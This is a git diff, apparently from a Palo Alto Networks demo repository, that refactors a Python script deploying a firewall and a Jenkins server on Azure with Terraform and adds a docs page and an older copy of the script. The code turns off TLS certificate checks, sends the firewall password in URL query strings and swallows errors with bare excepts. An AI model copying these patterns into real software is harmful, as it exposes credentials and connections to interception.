+ <dl><dt><a name="-update_status"><strong>update_status</strong></a>(key, value)</dt><dd><tt>For&nbsp;tracking&nbsp;purposes.&nbsp;&nbsp;Write&nbsp;responses&nbsp;to&nbsp;file.<br>
+:param&nbsp;key:<br>
+:param&nbsp;value:<br>
+:return:</tt></dd></dl>
+ <dl><dt><a name="-walkdict"><strong>walkdict</strong></a>(d, key)</dt><dd><tt>Finds&nbsp;a&nbsp;key&nbsp;in&nbsp;a&nbsp;dict&nbsp;or&nbsp;nested&nbsp;dict&nbsp;and&nbsp;returns&nbsp;the&nbsp;value&nbsp;associated&nbsp;with&nbsp;it<br>
+:param&nbsp;d:&nbsp;dict&nbsp;or&nbsp;nested&nbsp;dict<br>
+:param&nbsp;key:&nbsp;key&nbsp;value<br>
+:return:&nbsp;value&nbsp;associated&nbsp;with&nbsp;key</tt></dd></dl>
+ <dl><dt><a name="-write_status_file"><strong>write_status_file</strong></a>(message_dict)</dt><dd><tt>Writes&nbsp;the&nbsp;deployment&nbsp;state&nbsp;to&nbsp;a&nbsp;dict&nbsp;and&nbsp;outputs&nbsp;to&nbsp;file&nbsp;for&nbsp;status&nbsp;tracking</tt></dd></dl>
+</td></tr></table><p>
+<table width="100%" cellspacing=0 cellpadding=2 border=0 summary="section">
+<tr bgcolor="#55aa55">
+<td colspan=3 valign=bottom>&nbsp;<br>
+<font color="#ffffff" face="helvetica, arial"><big><strong>Data</strong></big></font></td></tr>
+    
+<tr><td bgcolor="#55aa55"><tt>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</tt></td><td>&nbsp;</td>
+<td width="100%"><strong>formatter</strong> = &lt;logging.Formatter object&gt;<br>
+<strong>handler</strong> = &lt;StreamHandler &lt;stderr&gt; (NOTSET)&gt;<br>
+<strong>logger</strong> = &lt;RootLogger root (INFO)&gt;<br>
+<strong>status_output</strong> = {}</td></tr></table>
+</body></html>
\ No newline at end of file
diff --git a/azure/Jenkins_proj-master/deploy.py b/azure/Jenkins_proj-master/deploy.py
index 6be3620b..6328d84e 100644
--- a/azure/Jenkins_proj-master/deploy.py
+++ b/azure/Jenkins_proj-master/deploy.py
@@ -18,7 +18,7 @@
 
 Usage
 
-python deploy.py -u <fwusername> -p'<fwpassword>
+python deploy.py --username <fwusername> -p<fwpassword> -r<resource group> -j<region>
 
 """
 
@@ -31,15 +31,19 @@
 import time
 import uuid
 import xml.etree.ElementTree as ET
-
+import xmltodict
 import requests
 import urllib3
+
 from azure.common import AzureException
 from azure.storage.file import FileService
+
+
 from pandevice import firewall
 from python_terraform import Terraform
+from collections import OrderedDict
+
 
-# from . import cache_utils
 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 
 _archive_dir = './WebInDeploy/bootstrap'
@@ -51,19 +55,30 @@
 formatter = logging.Formatter('%(levelname)-8s %(message)s')
 handler.setFormatter(formatter)
 logger.addHandler(handler)
-logger.setLevel(logging.INFO)
+
 
 # global var to keep status output
 status_output = dict()
 
 
 def send_request(call):
+
+    """
+    Handles sending requests to API
+    :param call: url
+    :return: Retruns result of call. Will return response for codes between 200 and 400.
+             If 200 response code is required check value in response
+    """
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
     try:
-        r = requests.get(call, verify=False, timeout=5)
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
         r.raise_for_status()
     except requests.exceptions.HTTPError as errh:
         '''
-        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
         '''
         logger.debug("DeployRequestException Http Error:")
         raise DeployRequestException("Http Error:")
@@ -83,165 +98,210 @@ def send_request(call):
 class DeployRequestException(Exception):
     pass
 
+def walkdict(dict, match):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param key: key value
+    :return: value associated with key
+    """
+    for key, v in dict.items():
+        if key == match:
+            jobid = v
+            return jobid
+        elif isinstance(v, OrderedDict):
+            found = walkdict(v, match)
+            if found is not None:
+                return found
+
+
 
 def update_fw(fwMgtIP, api_key):
+    """
+    Applies latest AppID, Threat and AV updates to firewall after launch
+    :param fwMgtIP: Firewall management IP
+    :param api_key: API key
+
+    """
     # # Download latest applications and threats
+
     type = "op"
     cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
     call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    try:
-        r = send_request(call)
-    except DeployRequestException:
-        logger.debug("failed to get jobid this time.  Try again")
-    else:
-        tree = ET.fromstring(r.text)
-        jobid = tree[0][1].text
-        print("Download latest Applications and Threats update - " + str(jobid))
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
     completed = 0
-    while completed == 0:
-        time.sleep(10)
+    while (completed == 0):
+        time.sleep(45)
         call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
         try:
             r = send_request(call)
-            logger.info('Response to show jobs was {}'.format(r.text))
-            if 'not found' in r.text:
-                raise DeployRequestException(r.text)
-
-        except DeployRequestException:
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
             logger.debug("failed to get jobid this time.  Try again")
         else:
             tree = ET.fromstring(r.text)
             if tree.attrib['status'] == 'success':
-
-                if (tree[0][0][5].text == 'FIN'):
-                    logger.debug("APP+TP download Complete ")
-                    completed = 1
-                else:
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete ")
+                        completed = 1
                     print("Download latest Applications and Threats update")
                     status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
                         tree[0][0][12].text) + "% complete"
                     print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
 
-    # Install latest applications and threats without committing
-    time.sleep(1)
+    # Install latest content update
     type = "op"
     cmd = "<request><content><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></content></request>"
     call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    try:
-        r = send_request(call)
-    except:
-        DeployRequestException
-        logger.debug("Requested content install but got response{}".format(r))
-    else:
-        print("request for content upgrade response was {}".format(r.text))
-        tree = ET.fromstring(r.text)
-        if tree.attrib['status'] == 'success':
-            '''
-            Check that we were able to schedule the install
-            Valid response would contain
-            <response status="success">
-            Invalid response would contain
-            <response status="error">
-            '''
-            jobid = tree[0][1].text
-            print("Install latest Applications and Threats update - " + str(jobid))
-
-            completed = 0
-            while (completed == 0):
-                time.sleep(10)
-                call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
-                    fwMgtIP, jobid, api_key)
-                r = send_request(call)
-                tree = ET.fromstring(r.text)
-                if tree.attrib['status'] == 'success':
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
 
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
                     if (tree[0][0][5].text == 'FIN'):
-                        logger.debug("APP+TP install Complete ")
+                        logger.debug("APP+TP Install Complete ")
                         completed = 1
-                    else:
-                        print("tree value {}".format(tree[0][0][5].text))
-                        status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str(
-                            tree[0][0][12].text) + "% complete"
-                        print('{0}\r'.format(status))
-        else:
-            logger.debug("Unable to schedule install")
+                    print("Install latest Applications and Threats update")
+                    status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
+
 
-    # download latest anti-virus update
+    # Download latest anti-virus update without committing
+    getjobid = 0
+    jobid = ''
     type = "op"
     cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
-    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    try:
-        r = send_request(call)
-    except:
-        DeployRequestException
-        logger.debug("Requested AV download but got response{}".format(DeployRequestException))
-    else:
-        tree = ET.fromstring(r.text)
-        jobid = tree[0][1].text
-        logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid)))
+    key = 'job'
+    while getjobid == 0:
+        try:
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
 
     completed = 0
     while (completed == 0):
-        time.sleep(10)
-        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+            fwMgtIP, jobid, api_key)
         r = send_request(call)
-
         tree = ET.fromstring(r.text)
         logger.debug('Got response for show job {}'.format(r.text))
         if tree.attrib['status'] == 'success':
-
-            if (tree[0][0][5].text == 'FIN'):
-                logger.debug(
-                    "AV download Complete - ")
-                completed = 1
-            else:
-                status = "AV download Status - " + str(tree[0][0][5].text) + " " + str(
-                    tree[0][0][12].text) + "% complete"
-                print('{0}\r'.format(status))
-
-    # install latest anti-virus update without committing
-    type = "op"
-    cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
-    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
-    r = send_request(call)
-    tree = ET.fromstring(r.text)
-    logger.debug('Got response for show job {}'.format(r.text))
-    if tree.attrib['status'] == 'success':
-        '''
-        Check that we were able to schedule the install
-        Valid response would contain
-        <response status="success">
-        Invalid response would contain
-        <response status="error">
-        '''
-        jobid = tree[0][1].text
-        print("Install latest Anti-Virus update - " + str(jobid))
-
-        completed = 0
-        while (completed == 0):
-            time.sleep(10)
-            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
-                fwMgtIP, jobid, api_key)
-            r = send_request(call)
-            tree = ET.fromstring(r.text)
-
-            logger.debug('Got response for show job {}'.format(r.text))
-            if tree.attrib['status'] == 'success':
-
+            try:
                 if (tree[0][0][5].text == 'FIN'):
-                    logger.debug("AV install Status Complete ")
+                    logger.info("AV install Status Complete ")
                     completed = 1
                 else:
                     status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
                     print('{0}\r'.format(status))
-    else:
-        logger.debug("Unable to schedule install")
+            except:
+                logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+                completed = 1
+        else:
+            logger.info('Unable to determine job status')
+            completed = 1
 
 
 def getApiKey(hostname, username, password):
-    '''
-    Generate the API key from username / password
-    '''
+
+    """
+    Generates a Paloaltonetworks api key from username and password credentials
+    :param hostname: Ip address of firewall
+    :param username:
+    :param password:
+    :return: api_key API key for firewall
+    """
+
 
     print("getting api key")
     call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
@@ -277,7 +337,6 @@ def getFirewallStatus(fwIP, api_key):
     :param fwMgtIP:  IP Address of firewall interface to be probed
     :param api_key:  Panos API key
     """
-    global gcontext
 
     url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
     # Send command to fw and see if it times out or we get a response
@@ -326,6 +385,12 @@ def getFirewallStatus(fwIP, api_key):
 
 
 def update_status(key, value):
+    """
+    For tracking purposes.  Write responses to file.
+    :param key:
+    :param value:
+    :return:
+    """
     global status_output
 
     if type(status_output) is not dict:
@@ -355,7 +420,13 @@ def write_status_file(message_dict):
 
 
 def create_azure_fileshare(share_prefix, account_name, account_key):
-    # generate a unique share name to avoid overlaps in shared infra
+    """
+    Generate a unique share name to avoid overlaps in shared infra
+    :param share_prefix:
+    :param account_name:
+    :param account_key:
+    :return:
+    """
 
     # FIXME - Need to remove hardcoded directoty link below
 
@@ -407,6 +478,7 @@ def create_azure_fileshare(share_prefix, account_name, account_key):
 def getServerStatus(IP):
     """
     Gets the server status by sending an HTTP request and checking for a 200 response code
+
     """
     global gcontext
 
@@ -414,9 +486,10 @@ def getServerStatus(IP):
     logger.info('URL request is {}'.format(call))
     # Send command to fw and see if it times out or we get a response
     count = 0
-    max_count = 15
+    max_count = 12
     while True:
         if count < max_count:
+            time.sleep(10)
             try:
                 count = count + 1
                 r = send_request(call)
@@ -430,24 +503,17 @@ def getServerStatus(IP):
     return 'server_down'
 
 
-def main(username, password, rg_name):
-    username = username
-    password = password
-
-    WebInBootstrap_vars = {
-        'RG_Name': rg_name
-    }
-
-    WebInDeploy_vars = {
-        'Admin_Username': username,
-        'Admin_Password': password
-    }
+def apply_tf(working_dir, vars, description):
 
-    WebInFWConf_vars = {
-        'Admin_Username': username,
-        'Admin_Password': password
-    }
+    """
+    Handles terraform operations and returns variables in outputs.tf as a dict.
+    :param working_dir: Directory that contains the tf files
+    :param vars: Additional variables passed in to override defaults equivalent to -var
+    :param description: Description of the deployment for logging purposes
+    :return:    return_code - 0 for success or other for failure
+                outputs - Dictionary of the terraform outputs defined in the outputs.tf file
 
+    """
     # Set run_plan to TRUE is you wish to run terraform plan before apply
     run_plan = False
     kwargs = {"auto-approve": True}
@@ -462,40 +528,77 @@ def main(username, password, rg_name):
         # if capture output is False, then everything will essentially go to stdout and stderrf
         stderr = sys.stderr
         stdout = sys.stdout
-        start_time = time.asctime()
-        print(f'Starting Deployment at {start_time}\n')
+
+    start_time = time.asctime()
+    print('Starting Deployment at {}\n'.format(start_time))
 
     # Create Bootstrap
 
-    tf = Terraform(working_dir='./WebInBootstrap')
+    tf = Terraform(working_dir=working_dir)
 
     tf.cmd('init')
     if run_plan:
+
         # print('Calling tf.plan')
         tf.plan(capture_output=False)
-    return_code1, stdout, stderr = tf.apply(vars=WebInBootstrap_vars, capture_output=capture_output,
-                                            skip_plan=True, **kwargs)
 
-    resource_group = tf.output('Resource_Group')
-    bootstrap_bucket = tf.output('Bootstrap_Bucket')
-    storage_account_access_key = tf.output('Storage_Account_Access_Key')
-    web_in_bootstrap_output = tf.output()
+    return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+                                            skip_plan = True, **kwargs)
+    outputs = tf.output()
+
+    logger.debug('Got Return code {} for deployment of  {}'.format(return_code, description))
 
-    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
+    return (return_code, outputs)
 
-    update_status('web_in_deploy_stdout', stdout)
-    update_status('web_in_bootstrap_output', web_in_bootstrap_output)
 
-    if return_code1 != 0:
+def main(username, password, rg_name, azure_region):
+
+    """
+    Main function
+    :param username:
+    :param password:
+    :param rg_name: Resource group name prefix
+    :param azure_region: Region
+    :return:
+    """
+    username = username
+    password = password
+
+    WebInBootstrap_vars = {
+        'RG_Name': rg_name,
+        'Azure_Region': azure_region
+    }
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password,
+        'Azure_Region': azure_region
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    #
+    return_code, outputs = apply_tf('./WebInBootstrap',WebInBootstrap_vars, 'WebInBootstrap')
+
+    if return_code == 0:
+        share_prefix = 'jenkins-demo'
+        resource_group = outputs['Resource_Group']['value']
+        bootstrap_bucket = outputs['Bootstrap_Bucket']['value']
+        storage_account_access_key = outputs['Storage_Account_Access_Key']['value']
+        update_status('web_in_bootstrap_status', 'success')
+    else:
         logger.info("WebInBootstrap failed")
         update_status('web_in_bootstap_status', 'error')
-        update_status('web_in_bootstrap_stderr', stderr)
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('web_in_bootstrap_status', 'success')
 
-    share_prefix = 'jenkins-demo'
 
     share_name = create_azure_fileshare(share_prefix, bootstrap_bucket, storage_account_access_key)
 
@@ -505,46 +608,40 @@ def main(username, password, rg_name):
     WebInDeploy_vars.update({'Attack_RG_Name': resource_group})
     WebInDeploy_vars.update({'Storage_Account_Fileshare': share_name})
 
+    #
     # Build Infrastructure
+    #
+    #
 
-    tf = Terraform(working_dir='./WebInDeploy')
-    # print("vars {}".format(WebInDeploy_vars))
-    tf.cmd('init')
-    if run_plan:
-        # print('Calling tf.plan')
-        tf.plan(capture_output=False, var=WebInDeploy_vars)
 
-    return_code1, stdout, stderr = tf.apply(var=WebInDeploy_vars, capture_output=capture_output, skip_plan=True,
-                                            **kwargs)
+    return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
 
-    web_in_deploy_output = tf.output()
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
 
-    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code1))
 
-    update_status('web_in_deploy_stdout', stdout)
     update_status('web_in_deploy_output', web_in_deploy_output)
-    if return_code1 != 0:
+    if return_code == 0:
+        update_status('web_in_deploy_status', 'success')
+        albDns = web_in_deploy_output['ALB-DNS']['value']
+        fwMgt = web_in_deploy_output['MGT-IP-FW-1']['value']
+        nlbDns = web_in_deploy_output['NLB-DNS']['value']
+        fwMgtIP = web_in_deploy_output['MGT-IP-FW-1']['value']
+
+        logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("AppGateway address is {}".format(albDns))
+        logger.info("Internal loadbalancer address is {}".format(nlbDns))
+        logger.info("Firewall Mgt address is {}".format(fwMgt))
+
+    else:
         logger.info("WebInDeploy failed")
         update_status('web_in_deploy_status', 'error')
-        update_status('web_in_deploy_stderr', stderr)
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('web_in_deploy_status', 'success')
-
-    albDns = tf.output('ALB-DNS')
-    fwMgt = tf.output('MGT-IP-FW-1')
-    nlbDns = tf.output('NLB-DNS')
-    fwMgtIP = tf.output('MGT-IP-FW-1')
-
-    logger.info("Got these values from output \n\n")
-    logger.info("AppGateway address is {}".format(albDns))
-    logger.info("Internal loadbalancer address is {}".format(nlbDns))
-    logger.info("Firewall Mgt address is {}".format(fwMgt))
 
     #
     # Check firewall is up and running
-    # #
+    #
+    #
 
     api_key = getApiKey(fwMgtIP, username, password)
 
@@ -577,45 +674,29 @@ def main(username, password, rg_name):
     logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
     time.sleep(10)
     fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
-    logger.info("Updating firewall with latest content pack")
 
+
+    logger.info("Updating firewall with latest content pack")
     update_fw(fwMgtIP, api_key)
 
     #
     # Configure Firewall
     #
     WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
-    tf = Terraform(working_dir='./WebInFWConf')
-    tf.cmd('init')
-    kwargs = {"auto-approve": True}
 
     logger.info("Applying addtional config to firewall")
 
-    WebInFWConf_vars['mgt-ipaddress-fw1'] = fwMgt
-
-    if run_plan:
-        tf.plan(capture_output=capture_output, var=WebInFWConf_vars)
-
-    # update initial vars with generated fwMgt ip
-
-    return_code2, stdout, stderr = tf.apply(capture_output=capture_output, skip_plan=True,
-                                            var=WebInFWConf_vars, **kwargs)
-
-    web_in_fw_conf_out = tf.output()
+    return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
 
-    update_status('web_in_fw_conf_output', web_in_fw_conf_out)
-    # update_status('web_in_fw_conf_stdout', stdout)
+    if return_code == 0:
+        update_status('web_in_fw_conf', 'success')
+        logger.info("WebInFWConf ok")
 
-    logger.debug('Got Return code for deploy WebInFwConf {}'.format(return_code2))
-
-    if return_code2 != 0:
-        logger.error("WebInFWConf failed")
-        update_status('web_in_fw_conf_status', 'error')
-        update_status('web_in_fw_conf_stderr', stderr)
+    else:
+        logger.info("WebInFWConf sent return code {}".format(return_code))
+        update_status('web_in_deploy_status', 'error')
         print(json.dumps(status_output))
         exit(1)
-    else:
-        update_status('web_in_fw_conf_status', 'success')
 
     logger.info("Commit changes to firewall")
 
@@ -630,8 +711,6 @@ def main(username, password, rg_name):
 
     logger.info('Checking if Jenkins Server is ready')
 
-    # FIXME - add outputs for all 3 dirs
-
     res = getServerStatus(albDns)
 
     if res == 'server_up':
@@ -651,10 +730,12 @@ def main(username, password, rg_name):
     parser.add_argument('-u', '--username', help='Firewall Username', required=True)
     parser.add_argument('-p', '--password', help='Firewall Password', required=True)
     parser.add_argument('-r', '--resource_group', help='Resource Group', required=True)
+    parser.add_argument('-j', '--azure_region', help='Azure Region', required=True)
 
     args = parser.parse_args()
     username = args.username
     password = args.password
     resource_group = args.resource_group
+    azure_region = args.azure_region
 
-    main(username, password, resource_group)
+    main(username, password, resource_group, azure_region)
diff --git a/azure/Jenkins_proj-master/deployold.py b/azure/Jenkins_proj-master/deployold.py
new file mode 100644
index 00000000..b2ddb37e
--- /dev/null
+++ b/azure/Jenkins_proj-master/deployold.py
@@ -0,0 +1,628 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -j<region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+
+import requests
+import urllib3
+from azure.common import AzureException
+from azure.storage.file import FileService
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+# from . import cache_utils
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+    
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    try:
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+
+def listRecursive (d, key):
+    for k, v in d.items ():
+        if isinstance (v, OrderedDict):
+            for found in listRecursive (v, key):
+                yield found
+        if k == key:
+            yield v
+
+def update_fw(fwMgtIP, api_key):
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid =0
+    jobid = ''
+    key ='job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    for found in listRecursive(dict, 'job'):
+                        jobid = found
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(30)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete " )
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+            else:
+                logger.info('Unable to determine job status')
+
+
+    # install latest anti-virus update without committing
+    getjobid =0
+    jobid = ''
+    key ='job'
+    while getjobid == 0:
+        try:
+
+            type = "op"
+            cmd = "<request><anti-virus><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></anti-virus></request>"
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    for found in listRecursive(dict, 'job'):
+                        jobid = found
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+        completed = 0
+        while (completed == 0):
+            time.sleep(30)
+            call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+                fwMgtIP, jobid, api_key)
+            r = send_request(call)
+            tree = ET.fromstring(r.text)
+
+            logger.debug('Got response for show job {}'.format(r.text))
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("AV install Status Complete ")
+                        completed = 1
+                    else:
+                        status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                        print('{0}\r'.format(status))
+                except:
+                    logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+
+            else:
+                logger.info('Unable to determine job status')
+
+
+def getApiKey(hostname, username, password):
+    '''
+    Generate the API key from username / password
+    '''
+
